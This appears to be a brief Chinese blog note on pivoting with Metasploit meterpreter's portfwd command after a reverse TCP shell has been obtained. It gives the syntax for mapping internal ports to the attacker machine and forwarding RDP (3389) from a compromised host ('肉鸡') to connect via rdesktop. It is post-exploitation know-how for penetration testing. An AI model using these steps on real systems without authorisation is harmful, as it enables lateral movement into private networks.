EndlessShw

1. 前置工作

  通过反弹tcp拿到meterpreter。porfwd工具的使用在meterpreter中

 

2. 端口映射

  portfwd add -L 攻击机ip -l 攻击机端口 -p 内网待渗透/开放端口 -r 内网待渗透ip

 

3. 端口转发,例如转发3389

  portfwd add -l 攻击机端口 -p 3389 -r 肉鸡ip

  然后再: rdesktop 127.0.0.1:攻击机端口。输入账号密码来进入远程界面。

 

4. 其他命令

  portfwd list  查看目前的活跃端口

  portfwd flush  清空列表

 

分类:

技术点:

相关文章:

  • 2021-08-06
  • 2021-12-15
  • 2022-12-23
  • 2021-12-03
  • 2021-12-31
  • 2022-01-15
  • 2021-12-05
猜你喜欢
  • 2021-12-09
  • 2021-12-05
  • 2021-11-17
  • 2021-12-03
  • 2021-06-23
相关资源
相似解决方案